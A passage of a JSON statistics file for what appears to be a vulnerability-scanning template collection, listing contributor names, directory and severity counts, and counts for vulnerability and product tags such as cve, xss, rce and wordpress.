(@cristivlad25)","count":2},{"name":"0xcrypto","count":2},{"name":"luci","count":2},{"name":"korteke","count":2},{"name":"gevakun","count":2},{"name":"raesene","count":2},{"name":"danielmofer","count":2},{"name":"hackerarpan","count":2},{"name":"parth","count":2},{"name":"dheerajmadhukar","count":2},{"name":"z0ne","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"ajaysenr","count":2},{"name":"mohammedsaneem","count":2},{"name":"kishore-hariram","count":2},{"name":"randomdhiraj","count":2},{"name":"gal nagli","count":2},{"name":"sascha brendel","count":2},{"name":"nuk3s3c","count":2},{"name":"maximus decimus","count":2},{"name":"k11h-de","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"joshua rogers","count":2},{"name":"j3ssie","count":2},{"name":"smaranchand","count":2},{"name":"nkxxkn","count":2},{"name":"0xnirvana","count":2},{"name":"pxmme1337","count":2},{"name":"c3l3si4n","count":2},{"name":"ynnirc","count":1},{"name":"1nf1n7y","count":1},{"name":"ahmed sherif","count":1},{"name":"zy9ard3","count":1},{"name":"yuansec","count":1},{"name":"dhiyaneshdki","count":1},{"name":"supr4s","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lrtk-coder","count":1},{"name":"elouhi","count":1},{"name":"revblock","count":1},{"name":"unp4ck","count":1},{"name":"jcockhren","count":1},{"name":"alevsk","count":1},{"name":"oscarintherocks","count":1},{"name":"dali","count":1},{"name":"deena","count":1},{"name":"exid","count":1},{"name":"aayush vishnoi","count":1},{"name":"marcos_iaf","count":1},{"name":"0xd0ff9","count":1},{"name":"rotembar","count":1},{"name":"y0no","count":1},{"name":"mukundbhuva","count":1},{"name":"xshuden","count":1},{"name":"pudsec","count":1},{"name":"aron molnar","count":1},{"name":"akash.c","count":1},{"name":"mabdullah22","count":1},{"name":"nytr0gen","count":1},{"name":"flag007","count":1},{"name":"kiks7","count":1},{"name":"mihhailsokolov","count":1},{"name":"majidmc2","count":1},{"name":"anon-artist","count":1},{"name":"kagamigawa","count":1},{"name":"lixts","count":1},{"name":"jteles","count":1},{"name":"hczdmr","count":1},{"name":"ndmalc","count":1},{"name":"fq_hsu","count":1},{"name":"af001","count":1},{"name":"thebinitghimire","count":1},{"name":"jbertman","count":1},{"name":"kareemse1im","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"danigoland","count":1},{"name":"yashgoti","count":1},{"name":"borna nematzadeh","count":1},{"name":"keni0k","count":1},{"name":"husain","count":1},{"name":"osamahamad","count":1},{"name":"alex","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ransomsec","count":1},{"name":"patrick pirker","count":1},{"name":"booboohq","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"vzamanillo","count":1},{"name":"exploitation","count":1},{"name":"skylark-lab","count":1},{"name":"gtrrnr","count":1},{"name":"opencirt","count":1},{"name":"hanlaomo","count":1},{"name":"rubina119","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"furkansayim","count":1},{"name":"allenwest24","count":1},{"name":"mzack9999","count":1},{"name":"chron0x","count":1},{"name":"gboddin","count":1},{"name":"noobexploiter","count":1},{"name":"elmahdi","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sak1","count":1},{"name":"amnotacat","count":1},{"name":"ofjaaah","count":1},{"name":"jrolf","count":1},{"name":"iampritam","count":1},{"name":"paper-pen","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"becivells","count":1},{"name":"co0nan","count":1},{"name":"_harleo","count":1},{"name":"ahmed abou-ela","count":1},{"name":"th3.d1p4k","count":1},{"name":"wabafet","count":1},{"name":"xstp","count":1},{"name":"intx0x80","count":1},{"name":"alperenkesk","count":1},{"name":"calumjelrick","count":1},{"name":"zhenwarx","count":1},{"name":"vinit989","count":1},{"name":"s1r1u5_","count":1},{"name":"pry0cc","count":1},{"name":"jiheon-dev","count":1},{"name":"jeya.seelan","count":1},{"name":"tirtha_mandal","count":1},{"name":"mubassirpatel","count":1},{"name":"iphantasmic","count":1},{"name":"kiransau","count":1},{"name":"narluin","count":1},{"name":"tea","count":1},{"name":"whynotke","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"rschio","count":1},{"name":"_darrenmartyn","count":1},{"name":"hardik-rathod","count":1},{"name":"makyotox","count":1},{"name":"remonsec","count":1},{"name":"harshinsecurity","count":1},{"name":"nerrorsec","count":1},{"name":"blckraven","count":1},{"name":"5up3r541y4n","count":1},{"name":"p-l-","count":1},{"name":"breno_css","count":1},{"name":"akshansh","count":1},{"name":"arall","count":1},{"name":"clment cruchet","count":1},{"name":"rodnt","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"piyushchhiroliya","count":1},{"name":"omarkurt","count":1},{"name":"nielsing","count":1},{"name":"r3nz0","count":1},{"name":"evolutionsec","count":1},{"name":"ooooooo_q","count":1},{"name":"arr0way","count":1},{"name":"xeldax","count":1},{"name":"queencitycyber","count":1},{"name":"b4uh0lz","count":1},{"name":"jaskaran","count":1},{"name":"mhdsamx","count":1},{"name":"tirtha","count":1},{"name":"caon","count":1},{"name":"izn0u","count":1},{"name":"compr00t","count":1},{"name":"jaimin gondaliya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"shiva (strobes security)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"dmartyn","count":1},{"name":"brabbit10","count":1},{"name":"undefl0w","count":1},{"name":"aringo","count":1},{"name":"manuelbua","count":1},{"name":"tehtbl","count":1},{"name":"petergrifin","count":1},{"name":"retr02332","count":1},{"name":"rojanrijal","count":1},{"name":"ayadim","count":1},{"name":"phyr3wall","count":1},{"name":"noamrathaus","count":1},{"name":"sinsinology","count":1},{"name":"f1she3","count":1},{"name":"esonhugh","count":1},{"name":"omarjezi","count":1},{"name":"manasmbellani","count":1},{"name":"ok_bye_now","count":1},{"name":"luqman","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"duty_1g","count":1},{"name":"adrianmf","count":1},{"name":"apt-mirror","count":1},{"name":"regala_","count":1},{"name":"secthebit","count":1},{"name":"geraldino2","count":1},{"name":"juliosmelo","count":1},{"name":"ola456","count":1},{"name":"bugvsme","count":1},{"name":"nobody","count":1},{"name":"bughuntersurya","count":1},{"name":"sleepingbag945","count":1},{"name":"aresx","count":1},{"name":"charanrayudu","count":1},{"name":"djoevanka","count":1},{"name":"lamscun","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"th3r4id","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"un-fmunozs","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"michael wedl","count":1},{"name":"couskito","count":1},{"name":"pascalheidmann","count":1},{"name":"udyz","count":1},{"name":"jeya seelan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"alexrydzak","count":1},{"name":"0xceba","count":1},{"name":"momen eldawakhly","count":1},{"name":"toufik-airane","count":1},{"name":"luqmaan hadia","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"mantissts","count":1},{"name":"realexp3rt","count":1},{"name":"spac3wh1te","count":1},{"name":"dievus","count":1},{"name":"lark lab","count":1},{"name":"andysvints","count":1},{"name":"yashanand155","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"h4kux","count":1},{"name":"tarunkoyalwar","count":1},{"name":"pussycat0","count":1},{"name":"miroslavsotak","count":1},{"name":"shreyapohekar","count":1},{"name":"x6263","count":1},{"name":"aaronchen0","count":1},{"name":"colbyjack1134","count":1},{"name":"shifacyclewla","count":1},{"name":"andirrahmani1","count":1},{"name":"galoget","count":1},{"name":"imhunterand","count":1},{"name":"hakluke","count":1},{"name":"palanichamy_perumal","count":1},{"name":"jonathanwalker","count":1},{"name":"marcio mendes","count":1},{"name":"ayadi","count":1},{"name":"infosecsanyam","count":1},{"name":"bad5ect0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"ipanda","count":1},{"name":"sicksec","count":1},{"name":"shelld3v","count":1},{"name":"zandros0","count":1},{"name":"shockwave","count":1},{"name":"lingtren","count":1},{"name":"carrot2","count":1},{"name":"jbaines-r7","count":1},{"name":"elder tao","count":1},{"name":"0h1in9e","count":1},{"name":"rivalsec","count":1},{"name":"kchason","count":1},{"name":"official_blackhat13","count":1},{"name":"noraj","count":1},{"name":"metascan","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"freakyclown","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"kailashbohara","count":1},{"name":"ramondunker","count":1},{"name":"natto97","count":1},{"name":"ilovebinbash","count":1},{"name":"b0rn2r00t","count":1},{"name":"liquidsec","count":1},{"name":"bjhulst","count":1},{"name":"mass0ma","count":1},{"name":"mr. bobo hp","count":1},{"name":"j33n1k4","count":1},{"name":"mbmy","count":1},{"name":"myst7ic","count":1},{"name":"zeyad azima","count":1},{"name":"barthy.koeln","count":1},{"name":"qlkwej","count":1},{"name":"miryangjung","count":1},{"name":"sherlocksecurity","count":1},{"name":"8authur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"francescocarlucci","count":1},{"name":"ph33rr","count":1},{"name":"zinminphy0","count":1},{"name":"daffianfo","count":1},{"name":"lethargynavigator","count":1},{"name":"exceed","count":1},{"name":"igibanez","count":1},{"name":"hazana","count":1},{"name":"houdinis","count":1},{"name":"nuts7","count":1},{"name":"mah3sec_","count":1},{"name":"kaizensecurity","count":1},{"name":"bywalks","count":1},{"name":"0xh7ml","count":1},{"name":"micha3lb3n","count":1},{"name":"justmumu","count":1},{"name":"viniciuspereiras","count":1},{"name":"fmunozs","count":1},{"name":"droberson","count":1},{"name":"amanrawat","count":1},{"name":"petruknisme","count":1},{"name":"hakimkt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jc175","count":1},{"name":"nagli","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"evan rubinstien","count":1},{"name":"mariam tariq","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglis","count":1},{"name":"cookiehanhoan","count":1},{"name":"am0nt31r0","count":1},{"name":"open-sec","count":1},{"name":"viondexd","count":1},{"name":"shivampand3y","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"act1on3","count":1},{"name":"akokonunes","count":1},{"name":"2rs3c","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"ahmetpergamum","count":1},{"name":"notsoevilweasel","count":1},{"name":"knassar702","count":1},{"name":"therealtoastycat","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dale clarke","count":1},{"name":"erethon","count":1},{"name":"luskabol","count":1},{"name":"ringo","count":1},{"name":"furkansenan","count":1},{"name":"w0tx","count":1},{"name":"sickwell","count":1},{"name":"0xceeb","count":1},{"name":"fopina","count":1},{"name":"0xtavian","count":1},{"name":"stupidfish","count":1},{"name":"unkl4b","count":1},{"name":"davidfegyver","count":1},{"name":"wlayzz","count":1},{"name":"gpiechnik2","count":1},{"name":"higor melgaço","count":1},{"name":"httpvoid","count":1},{"name":"push4d","count":1},{"name":"absshax","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"tim_koopmans","count":1},{"name":"elitebaz","count":1},{"name":"b0yd","count":1},{"name":"ling","count":1},{"name":"philippdelteil","count":1},{"name":"kabirsuda","count":1},{"name":"udinchan","count":1},{"name":"0xteles","count":1},{"name":"berkdusunur","count":1},{"name":"dk999","count":1},{"name":"jub0bs","count":1},{"name":"irshadahamed","count":1},{"name":"jna1","count":1},{"name":"ggranjus","count":1},{"name":"ldionmarcil","count":1},{"name":"sec_hawk","count":1},{"name":"dwbzn","count":1},{"name":"topscoder","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"florianmaak","count":1},{"name":"kurohost","count":1},{"name":"ramkrishna sawant","count":1},{"name":"rotemreiss","count":1},{"name":"prettyboyaaditya","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"daviey","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"pratik khalane","count":1},{"name":"hexcat","count":1},{"name":"jas37","count":1},{"name":"arjunchandarana","count":1},{"name":"sshell","count":1},{"name":"mesaglio","count":1},{"name":"shiar","count":1}],"directory":[{"name":"http","count":5970},{"name":"workflows","count":190},{"name":"file","count":130},{"name":"network","count":98},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"contributors.json","count":1},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":2907},{"name":"high","count":1298},{"name":"medium","count":1076},{"name":"critical","count":717},{"name":"low","count":224},{"name":"unknown","count":27}],"types":[{"name":"file","count":130},{"name":"dns","count":18}]} +{"tags":[{"name":"cve","count":2239},{"name":"panel","count":1018},{"name":"wordpress","count":923},{"name":"xss","count":837},{"name":"exposure","count":820},{"name":"wp-plugin","count":807},{"name":"osint","count":675},{"name":"tech","count":637},{"name":"lfi","count":614},{"name":"edb","count":598},{"name":"misconfig","count":536},{"name":"rce","count":522},{"name":"packetstorm","count":504},{"name":"cve2021","count":468},{"name":"wpscan","count":465},{"name":"cve2022","count":456},{"name":"wp","count":388},{"name":"unauth","count":343},{"name":"authenticated","count":321},{"name":"file","count":319},{"name":"sqli","count":293},{"name":"cve2023","count":270},{"name":"intrusive","count":265},{"name":"cve2020","count":253},{"name":"token-spray","count":242},{"name":"kev","count":239},{"name":"top-200","count":212},{"name":"osint-social","count":210},{"name":"config","count":207},{"name":"oast","count":205},{"name":"","count":195},{"name":"token","count":194},{"name":"default-login","count":179},{"name":"login","count":175},{"name":"iot","count":163},{"name":"apache","count":158},{"name":"cve2018","count":158},{"name":"cve2019","count":156},{"name":"detect","count":147},{"name":"joomla","count":146},{"name":"malware","count":131},{"name":"redirect","count":124},{"name":"cve2010","count":112},{"name":"auth-bypass","count":111},{"name":"network","count":110},{"name":"cve2017","count":108},{"name":"cms","count":107},{"name":"ssrf","count":104},{"name":"files","count":104},{"name":"router","count":102},{"name":"top-100","count":100},{"name":"install","count":85},{"name":"disclosure","count":84},{"name":"devops","count":82},{"name":"takeover","count":74},{"name":"seclists","count":72},{"name":"fileupload","count":69},{"name":"oracle","count":66},{"name":"oss","count":65},{"name":"cisco","count":59},{"name":"huntr","count":58},{"name":"cve2015","count":56},{"name":"adobe","count":55},{"name":"google","count":54},{"name":"cve2016","count":54},{"name":"tokens","count":52},{"name":"atlassian","count":49},{"name":"log4j","count":46},{"name":"tenable","count":46},{"name":"logs","count":46},{"name":"osint-gaming","count":45},{"name":"vmware","count":45},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"hackerone","count":44},{"name":"aem","count":44},{"name":"jndi","count":43},{"name":"c2","count":43},{"name":"cve2014","count":43},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":41},{"name":"springboot","count":39},{"name":"traversal","count":39},{"name":"oa","count":38},{"name":"cnvd","count":37},{"name":"jira","count":37},{"name":"aws","count":36},{"name":"listing","count":36},{"name":"deserialization","count":36},{"name":"osint-misc","count":35},{"name":"misc","count":35},{"name":"injection","count":35},{"name":"kubernetes","count":35},{"name":"php","count":34},{"name":"ir","count":33},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"sap","count":29},{"name":"microsoft","count":28},{"name":"gitlab","count":28},{"name":"fuzz","count":28},{"name":"api","count":27},{"name":"wp-theme","count":27},{"name":"k8s","count":26},{"name":"cve2012","count":26},{"name":"firewall","count":25},{"name":"weaver","count":25},{"name":"proxy","count":25},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-finance","count":24},{"name":"osint-shopping","count":24},{"name":"zoho","count":23},{"name":"cloud","count":23},{"name":"amazon","count":23},{"name":"lfr","count":23},{"name":"stored-xss","count":23},{"name":"dlink","count":22},{"name":"tomcat","count":22},{"name":"keys","count":22},{"name":"ecology","count":21},{"name":"ibm","count":21},{"name":"weblogic","count":21},{"name":"yonyou","count":21},{"name":"ssl","count":21},{"name":"printer","count":21},{"name":"msf","count":21},{"name":"fortinet","count":20},{"name":"admin","count":20},{"name":"xxe","count":20},{"name":"cicd","count":20},{"name":"camera","count":20},{"name":"github","count":20},{"name":"rukovoditel","count":19},{"name":"jenkins","count":19},{"name":"grafana","count":19},{"name":"dns","count":19},{"name":"struts","count":19},{"name":"wavlink","count":18},{"name":"osint-music","count":18},{"name":"citrix","count":18},{"name":"service","count":18},{"name":"ftp","count":17},{"name":"nginx","count":17},{"name":"cve2011","count":17},{"name":"microweber","count":16},{"name":"osint-blog","count":16},{"name":"backup","count":16},{"name":"android","count":16},{"name":"cve2009","count":16},{"name":"confluence","count":15},{"name":"seeyon","count":15},{"name":"enum","count":15},{"name":"cnvd2021","count":15},{"name":"status","count":15},{"name":"tongda","count":15},{"name":"java","count":15},{"name":"mail","count":15},{"name":"hp","count":15},{"name":"zyxel","count":15},{"name":"cve2008","count":15},{"name":"magento","count":15},{"name":"jarm","count":15},{"name":"rconfig","count":15},{"name":"nodejs","count":14},{"name":"domainmod","count":14},{"name":"bypass","count":14},{"name":"woocommerce","count":14},{"name":"npm","count":14},{"name":"audit","count":14},{"name":"login-check","count":14},{"name":"creds-stuffing","count":14},{"name":"ruijie","count":14},{"name":"coldfusion","count":14},{"name":"osint-health","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"cve2013","count":14},{"name":"azure","count":13},{"name":"fortigate","count":13},{"name":"backdoor","count":13},{"name":"vpn","count":13},{"name":"abstractapi","count":13},{"name":"file-upload","count":13},{"name":"sonicwall","count":13},{"name":"icewarp","count":13},{"name":"laravel","count":13},{"name":"airflow","count":13},{"name":"cuppa","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"rails","count":13},{"name":"ruby","count":13},{"name":"dashboard","count":12},{"name":"netsweeper","count":12},{"name":"netgear","count":12},{"name":"graphql","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"dell","count":12},{"name":"git","count":12},{"name":"drupal","count":12},{"name":"auth","count":12},{"name":"kafka","count":12},{"name":"alibaba","count":12},{"name":"docker","count":11},{"name":"ssti","count":11},{"name":"setup","count":11},{"name":"jolokia","count":11},{"name":"headless","count":11},{"name":"online-fire-reporting","count":11},{"name":"phpmyadmin","count":11},{"name":"spring","count":11},{"name":"fastjson","count":11},{"name":"ssh","count":11},{"name":"xstream","count":11},{"name":"prestashop","count":11},{"name":"osint-video","count":11},{"name":"zabbix","count":10},{"name":"digitalocean","count":10},{"name":"dedecms","count":10},{"name":"node","count":10},{"name":"solarview","count":10},{"name":"windows","count":10},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"django","count":10},{"name":"db","count":10},{"name":"redis","count":10},{"name":"installer","count":10},{"name":"prometheus","count":10},{"name":"symfony","count":10},{"name":"sitecore","count":10},{"name":"druid","count":9},{"name":"pfsense","count":9},{"name":"iis","count":9},{"name":"scada","count":9},{"name":"opencats","count":9},{"name":"bitbucket","count":9},{"name":"kube","count":9},{"name":"sangfor","count":9},{"name":"elasticsearch","count":9},{"name":"vcenter","count":9},{"name":"firebase","count":9},{"name":"smtp","count":9},{"name":"wso2","count":9},{"name":"versa","count":9},{"name":"cnvd2020","count":9},{"name":"cache","count":9},{"name":"jetbrains","count":9},{"name":"gitea","count":9},{"name":"solr","count":9},{"name":"hms","count":8},{"name":"manager","count":8},{"name":"ognl","count":8},{"name":"osint-news","count":8},{"name":"recon","count":8},{"name":"exchange","count":8},{"name":"unauthenticated","count":8},{"name":"symantec","count":8},{"name":"console","count":8},{"name":"e-office","count":8},{"name":"hikvision","count":8},{"name":"spotweb","count":8},{"name":"cisco-switch","count":8},{"name":"mirai","count":8},{"name":"vbulletin","count":8},{"name":"config-audit","count":8},{"name":"emerge","count":8},{"name":"crlf","count":8},{"name":"oauth","count":8},{"name":"bucket","count":8},{"name":"atom","count":8},{"name":"metadata","count":8},{"name":"default-page","count":8},{"name":"gogs","count":7},{"name":"hashicorp","count":7},{"name":"solarwinds","count":7},{"name":"pmb","count":7},{"name":"maps","count":7},{"name":"filemanager","count":7},{"name":"ivanti","count":7},{"name":"bloofox","count":7},{"name":"moodating","count":7},{"name":"nagios","count":7},{"name":"huawei","count":7},{"name":"squirrelmail","count":7},{"name":"sophos","count":7},{"name":"exploitdb","count":7},{"name":"discord","count":7},{"name":"fortios","count":7},{"name":"wanhu","count":7},{"name":"shopify","count":7},{"name":"moodle","count":7},{"name":"error","count":7},{"name":"odoo","count":7},{"name":"blockchain","count":7},{"name":"mobileiron","count":7},{"name":"blind","count":7},{"name":"websphere","count":7},{"name":"facebook","count":7},{"name":"ec2","count":7},{"name":"artica","count":7},{"name":"ofbiz","count":7},{"name":"instrusive","count":7},{"name":"nacos","count":7},{"name":"bigip","count":7},{"name":"go","count":7},{"name":"dropbox","count":7},{"name":"nagiosxi","count":7},{"name":"secret","count":7},{"name":"samsung","count":7},{"name":"vms","count":7},{"name":"avtech","count":7},{"name":"cockpit","count":6},{"name":"zhiyuan","count":6},{"name":"minio","count":6},{"name":"phpinfo","count":6},{"name":"jamf","count":6},{"name":"plesk","count":6},{"name":"74cms","count":6},{"name":"kubelet","count":6},{"name":"cacti","count":6},{"name":"openvpn","count":6},{"name":"mongodb","count":6},{"name":"js","count":6},{"name":"opensis","count":6},{"name":"database","count":6},{"name":"microstrategy","count":6},{"name":"log","count":6},{"name":"liferay","count":6},{"name":"sonarqube","count":6},{"name":"leak","count":6},{"name":"newrelic","count":6},{"name":"tikiwiki","count":6},{"name":"cobbler","count":6},{"name":"webmin","count":6},{"name":"magmi","count":6},{"name":"elfinder","count":6},{"name":"jetty","count":6},{"name":"activemq","count":6},{"name":"jeecg","count":6},{"name":"nexus","count":6},{"name":"fpd","count":6},{"name":"asp","count":6},{"name":"doctor-appointment-system","count":6},{"name":"s3","count":6},{"name":"lucee","count":6},{"name":"slack","count":6},{"name":"rfi","count":6},{"name":"keycloak","count":6},{"name":"flutterwave","count":6},{"name":"python","count":6},{"name":"hybris","count":5},{"name":"vrealize","count":5},{"name":"servicenow","count":5},{"name":"xmlrpc","count":5},{"name":"zzzcms","count":5},{"name":"web3","count":5},{"name":"metinfo","count":5},{"name":"avaya","count":5},{"name":"carrental","count":5},{"name":"kkfileview","count":5},{"name":"paypal","count":5},{"name":"resin","count":5},{"name":"microfocus","count":5},{"name":"landray","count":5},{"name":"storage","count":5},{"name":"caucho","count":5},{"name":"fatpipe","count":5},{"name":"jwt","count":5},{"name":"tls","count":5},{"name":"awstats","count":5},{"name":"sql","count":5},{"name":"jupyter","count":5},{"name":"rseenet","count":5},{"name":"circarlife","count":5},{"name":"strapi","count":5},{"name":"asana","count":5},{"name":"firmware","count":5},{"name":"parallels","count":5},{"name":"openemr","count":5},{"name":"terramaster","count":5},{"name":"info-leak","count":5},{"name":"apisix","count":5},{"name":"couchdb","count":5},{"name":"gocd","count":5},{"name":"bmc","count":5},{"name":"elastic","count":5},{"name":"jabber","count":5},{"name":"typo3","count":5},{"name":"adminer","count":5},{"name":"ethereum","count":5},{"name":"tenda","count":5},{"name":"avideo","count":5},{"name":"geoserver","count":5},{"name":"server","count":5},{"name":"ruckus","count":5},{"name":"chanjet","count":5},{"name":"akamai","count":5},{"name":"square","count":5},{"name":"beyondtrust","count":5},{"name":"papercut","count":5},{"name":"pie-register","count":4},{"name":"mlflow","count":4},{"name":"goanywhere","count":4},{"name":"craftcms","count":4},{"name":"cve2007","count":4},{"name":"candidats","count":4},{"name":"kibana","count":4},{"name":"swagger","count":4},{"name":"sentry","count":4},{"name":"gateway","count":4},{"name":"springcloud","count":4},{"name":"metasploit","count":4},{"name":"aura","count":4},{"name":"cloudflare","count":4},{"name":"artifactory","count":4},{"name":"mikrotik","count":4},{"name":"metersphere","count":4},{"name":"newstatpress","count":4},{"name":"ampache","count":4},{"name":"casaos","count":4},{"name":"osint-archived","count":4},{"name":"photo","count":4},{"name":"codeigniter","count":4},{"name":"pentaho","count":4},{"name":"sendgrid","count":4},{"name":"httpd","count":4},{"name":"password","count":4},{"name":"panabit","count":4},{"name":"finicity","count":4},{"name":"zte","count":4},{"name":"pixie","count":4},{"name":"mysql","count":4},{"name":"elementor","count":4},{"name":"datadog","count":4},{"name":"metabase","count":4},{"name":"shiro","count":4},{"name":"hongdian","count":4},{"name":"qdpm","count":4},{"name":"kevinlab","count":4},{"name":"spark","count":4},{"name":"httpserver","count":4},{"name":"kentico","count":4},{"name":"totolink","count":4},{"name":"express","count":4},{"name":"redmine","count":4},{"name":"hongfan","count":4},{"name":"openfire","count":4},{"name":"nosqli","count":4},{"name":"puppet","count":4},{"name":"phpjabber","count":4},{"name":"flink","count":4},{"name":"grav","count":4},{"name":"yeswiki","count":4},{"name":"thinkcmf","count":4},{"name":"mautic","count":4},{"name":"churchcrm","count":4},{"name":"centos","count":4},{"name":"rabbitmq","count":4},{"name":"kingsoft","count":4},{"name":"confluent","count":4},{"name":"gnuboard","count":4},{"name":"bittrex","count":4},{"name":"prtg","count":4},{"name":"cnvd2022","count":4},{"name":"smb","count":4},{"name":"dolibarr","count":4},{"name":"ems","count":4},{"name":"seagate","count":4},{"name":"concrete","count":4},{"name":"nextjs","count":4},{"name":"umbraco","count":4},{"name":"easypost","count":4},{"name":"age-encryption","count":4},{"name":"mostracms","count":4},{"name":"jorani","count":4},{"name":"consul","count":4},{"name":"info","count":4},{"name":"graylog","count":4},{"name":"ldap","count":4},{"name":"flatpress","count":4},{"name":"webshell","count":4},{"name":"mailchimp","count":4},{"name":"zend","count":4},{"name":"hoteldruid","count":4},{"name":"sound4","count":4},{"name":"splunk","count":4},{"name":"jellyfin","count":4},{"name":"linkerd","count":4},{"name":"panos","count":4},{"name":"harbor","count":4},{"name":"stripe","count":4},{"name":"cve2005","count":4},{"name":"froxlor","count":4},{"name":"pega","count":4},{"name":"telerik","count":4},{"name":"mostra","count":4},{"name":"telesquare","count":4},{"name":"phppgadmin","count":4},{"name":"roxy","count":4},{"name":"hpe","count":4},{"name":"ebs","count":4},{"name":"wcs","count":4},{"name":"powerjob","count":4},{"name":"flickr","count":4},{"name":"teamcity","count":4},{"name":"axigen","count":4},{"name":"horde","count":4},{"name":"cnvd2019","count":4},{"name":"aspose","count":4},{"name":"postmessage","count":4},{"name":"dropbear","count":4},{"name":"wp-statistics","count":4},{"name":"qnap","count":4},{"name":"search","count":4},{"name":"arcgis","count":4},{"name":"javascript","count":4},{"name":"openstack","count":4},{"name":"mantisbt","count":4},{"name":"voip","count":4},{"name":"royalevent","count":4},{"name":"heroku","count":4},{"name":"telnet","count":3},{"name":"superadmin","count":3},{"name":"http","count":3},{"name":"zendesk","count":3},{"name":"covenant","count":3},{"name":"rancher","count":3},{"name":"modem","count":3},{"name":"bitrix","count":3},{"name":"pyload","count":3},{"name":"payara","count":3},{"name":"glassfish","count":3},{"name":"etsy","count":3},{"name":"dom","count":3},{"name":"angular","count":3},{"name":"itop","count":3},{"name":"sharepoint","count":3},{"name":"petya","count":3},{"name":"fastly","count":3},{"name":"dreambox","count":3},{"name":"mcafee","count":3},{"name":"bruteforce","count":3},{"name":"fanwei","count":3},{"name":"empirecms","count":3},{"name":"loytec","count":3},{"name":"r-seenet","count":3},{"name":"flexvnf","count":3},{"name":"netlify","count":3},{"name":"mailgun","count":3},{"name":"rat","count":3},{"name":"targa","count":3},{"name":"pip","count":3},{"name":"env","count":3},{"name":"subrion","count":3},{"name":"ansible","count":3},{"name":"selenium","count":3},{"name":"credential","count":3},{"name":"ampps","count":3},{"name":"fanruan","count":3},{"name":"openai","count":3},{"name":"graph","count":3},{"name":"e-cology","count":3},{"name":"gibbon","count":3},{"name":"weiphp","count":3},{"name":"newsletter","count":3},{"name":"dos","count":3},{"name":"unifi","count":3},{"name":"linksys","count":3},{"name":"kyocera","count":3},{"name":"processwire","count":3},{"name":"sftp","count":3},{"name":"flutter","count":3},{"name":"openam","count":3},{"name":"aptus","count":3},{"name":"rackn","count":3},{"name":"mpsec","count":3},{"name":"sitemap","count":3},{"name":"proftpd","count":3},{"name":"webtareas","count":3},{"name":"axway","count":3},{"name":"httpbin","count":3},{"name":"sugarcrm","count":3},{"name":"i3geo","count":3},{"name":"wbce","count":3},{"name":"juniper","count":3},{"name":"mongo","count":3},{"name":"securepoint","count":3},{"name":"selea","count":3},{"name":"fuelcms","count":3},{"name":"key","count":3},{"name":"sharefile","count":3},{"name":"nc","count":3},{"name":"geowebserver","count":3},{"name":"nortek","count":3},{"name":"intercom","count":3},{"name":"matrix","count":3},{"name":"copyparty","count":3},{"name":"spip","count":3},{"name":"d-link","count":3},{"name":"jitsi","count":3},{"name":"dzzoffice","count":3},{"name":"dahua","count":3},{"name":"influxdb","count":3},{"name":"figma","count":3},{"name":"octobercms","count":3},{"name":"idrac","count":3},{"name":"buffalo","count":3},{"name":"cnvd2023","count":3},{"name":"monstra","count":3},{"name":"tableau","count":3},{"name":"webmail","count":3},{"name":"samba","count":3},{"name":"movable","count":3},{"name":"webkul-qloapps","count":3},{"name":"jfrog","count":3},{"name":"rlm","count":3},{"name":"mapbox","count":3},{"name":"vercel","count":3},{"name":"self-hosted","count":3},{"name":"moveit","count":3},{"name":"circleci","count":3},{"name":"kavita","count":3},{"name":"postgresql","count":3},{"name":"adiscon","count":3},{"name":"nuuo","count":3},{"name":"casdoor","count":3},{"name":"electron","count":3},{"name":"lotus","count":3},{"name":"dubbo","cou